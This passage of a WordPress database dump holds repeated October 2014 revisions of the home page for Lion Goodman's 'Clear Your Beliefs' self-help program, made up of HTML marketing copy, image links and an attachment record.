height="60" /></a> </strong></p>\n<em>What You Can Accomplish with Clear Your Beliefs</em>\n\nRelease hurt and pain from the past\nClear resistance to taking action\nOpen to new possibilities\nEliminate blocks to manifestation\nFind your true purpose\nDelete what’s been holding you back\n\nChange your personality style\nOpen to deeper, more profound love\nRecognize your spiritual nature\nBecome less reactive, more calm\nRediscover the source of your personal power\n\n<em>How and Why It Works</em>\n\nBeliefs are the major cause of upset and unhappiness\nCYB clears beliefs at the core of the psyche, where they live\nAll 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)\nYou take charge and decide what you want to believe\nYou’re guided gently, step-by-step, through the entire process\nYou decide how far to go, and what changes to make\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 220px; margin-bottom: 0px;"><a href="http://clearyourbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" style="width: 365px;" /></a></p>\n\nCopyright 2014 Clear Your Beliefs', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-20 18:49:15', '2014-10-20 23:49:15', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1556, 2, '2014-10-20 18:50:47', '2014-10-20 23:50:47', '<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />[Form id="10"] Free App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;"><strong>DOWNLOAD THE FREE iClearIt APP</strong></p>\n\n<p style="text-align: center; font-size: 14px;">Start Clearing Whatever Is In The Way Right Now\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\nSpecial Program\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> </strong></p>What You Can Accomplish with <em>Clear Your Beliefs</em> Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you back<p> </p>Change your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p> </p><p>How and Why It Works</p>Beliefs are the major cause of upset and unhappinessCYB clears beliefs at the core of the psyche, where they liveAll 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)You take charge and decide what you want to believeYou’re guided gently, step-by-step, through the entire processYou decide how far to go, and what changes to make\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 220px; margin-bottom: 0px;"><a href="http://clearyourbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" style="width: 365px;" /></a></p>\n\nCopyright 2014 Clear Your Beliefs', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-20 18:50:47', '2014-10-20 23:50:47', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1557, 2, '2014-10-20 18:53:27', '2014-10-20 23:53:27', '<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />[Form id="10"] Free App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;"><strong>DOWNLOAD THE FREE iClearIt APP</strong></p>\n\n<p style="text-align: center; font-size: 14px;">Start Clearing Whatever Is In The Way Right Now\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\nSpecial Program\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> </strong></p><p>What You Can Accomplish with <em>Clear Your Beliefs</em> </p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you back<p> </p>Change your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p> </p><p>How and Why It Works</p>Beliefs are the major cause of upset and unhappinessCYB clears beliefs at the core of the psyche, where they liveAll 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)You take charge and decide what you want to believeYou’re guided gently, step-by-step, through the entire processYou decide how far to go, and what changes to make\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 220px; margin-bottom: 0px;"><a href="http://clearyourbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" style="width: 365px;" /></a></p>\n\nCopyright 2014 Clear Your Beliefs', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-20 18:53:27', '2014-10-20 23:53:27', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1558, 2, '2014-10-20 18:57:57', '2014-10-20 23:57:57', '<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />[Form id="10"] Free App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;"><strong>DOWNLOAD THE FREE iClearIt APP</strong></p>\n\n<p style="text-align: center; font-size: 14px;">Start Clearing Whatever Is In The Way Right Now\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\nSpecial Program\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> </strong></p>\n\nWhat You Can Accomplish with <em>Clear Your Beliefs</em>\n\nRelease hurt and pain from the past\nClear resistance to taking action\nOpen to new possibilities\nEliminate blocks to manifestation\nFind your true purpose\nDelete what’s been holding you back\n\nChange your personality style\nOpen to deeper, more profound love\nRecognize your spiritual nature\nBecome less reactive, more calm\nRediscover the source of your personal power\n\nHow and Why It Works\n\nBeliefs are the major cause of upset and unhappiness\nCYB clears beliefs at the core of the psyche, where they live\nAll 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)\nYou take charge and decide what you want to believe\nYou’re guided gently, step-by-step, through the entire process\nYou decide how far to go, and what changes to make\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 220px; margin-bottom: 0px;"><a href="http://clearyourbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" style="width: 365px;" /></a></p>\n\nCopyright 2014 Clear Your Beliefs', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-20 18:57:57', '2014-10-20 23:57:57', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1559, 2, '2014-10-20 19:37:06', '2014-10-21 00:37:06', '', 'btn_03', '', 'inherit', 'closed', 'open', '', 'btn_03-2', '', '', '2014-10-20 19:37:06', '2014-10-21 00:37:06', '', 0, 'http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_031.png', 0, 'attachment', 'image/png', 0),
(1560, 2, '2014-10-20 19:40:22', '2014-10-21 00:40:22', '<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />[Form id="10"] Free App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;"><strong>DOWNLOAD THE FREE iClearIt APP</strong></p>\n\n<p style="text-align: center; font-size: 14px;">Start Clearing Whatever Is In The Way Right Now\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\nSpecial Program\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> </strong></p>\n\nWhat You Can Accomplish with <em>Clear Your Beliefs</em>\n\nRelease hurt and pain from the past\nClear resistance to taking action\nOpen to new possibilities\nEliminate blocks to manifestation\nFind your true purpose\nDelete what’s been holding you back\n\nChange your personality style\nOpen to deeper, more profound love\nRecognize your spiritual nature\nBecome less reactive, more calm\nRediscover the source of your personal power\n\nHow and Why It Works\n\nBeliefs are the major cause of upset and unhappiness\nCYB clears beliefs at the core of the psyche, where they live\nAll 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)\nYou take charge and decide what you want to believe\nYou’re guided gently, step-by-step, through the entire process\nYou decide how far to go, and what changes to make\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 220px;margin-bottom: 0px"><a href="http://clearbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_031.png" alt="btn_03" width="510" height="90" style="width: 365px" /></a></p>\n\nCopyright 2014 Clear Your Beliefs', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-20 19:40:22', '2014-10-21 00:40:22', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1561, 2, '2014-10-20 19:41:07', '2014-10-21 00:41:07', '<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />[Form id="10"] Free App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;"><strong>DOWNLOAD THE FREE iClearIt APP</strong></p>\n\n<p style="text-align: center; font-size: 14px;">Start Clearing Whatever Is In The Way Right Now\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\nSpecial Program\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> </strong></p>\n\nWhat You Can Accomplish with <em>Clear Your Beliefs</em>\n\nRelease hurt and pain from the past\nClear resistance to taking action\nOpen to new possibilities\nEliminate blocks to manifestation\nFind your true purpose\nDelete what’s been holding you back\n\nChange your personality style\nOpen to deeper, more profound love\nRecognize your spiritual nature\nBecome less reactive, more calm\nRediscover the source of your personal power\n\nHow and Why It Works\n\nBeliefs are the major cause of upset and unhappiness\nCYB clears beliefs at the core of the psyche, where they live\nAll 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)\nYou take charge and decide what you want to believe\nYou’re guided gently, step-by-step, through the entire process\nYou decide how far to go, and what changes to make\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 220px; margin-bottom: 0px;"><a href="http://clearbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_031.png" alt="btn_03" width="510" height="90" style="width: 365px;" /></a></p>\n\n© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-20 19:41:07', '2014-10-21 00:41:07', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1562, 2, '2014-10-20 19:58:35', '2014-10-21 00:58:35', '<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />[Form id="10"] Free App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center"><strong>DOWNLOAD THE FREE iClearIt APP</strong></p>\n\n<p style="text-align: center;font-size: 14px;margin-bottom: 46px">Start Clearing Whatever Is In The Way Right Now\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\nSpecial Program\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> </strong></p>\n\nWhat You Can Accomplish with <em>Clear Your Beliefs</em>\n\nRelease hurt and pain from the past\nClear resistance to taking action\nOpen to new possibilities\nEliminate blocks to manifestation\nFind your true purpose\nDelete what’s been holding you back\n\nChange your personality style\nOpen to deeper, more profound love\nRecognize your spiritual nature\nBecome less reactive, more calm\nRediscover the source of your personal power\n\nHow and Why It Works\n\nBeliefs are the major cause of upset and unhappiness\nCYB clears beliefs at the core of the psyche, where they live\nAll 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)\nYou take charge and decide what you want to believe\nYou’re guided gently, step-by-step, through the entire process\nYou decide how far to go, and what changes to make\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a 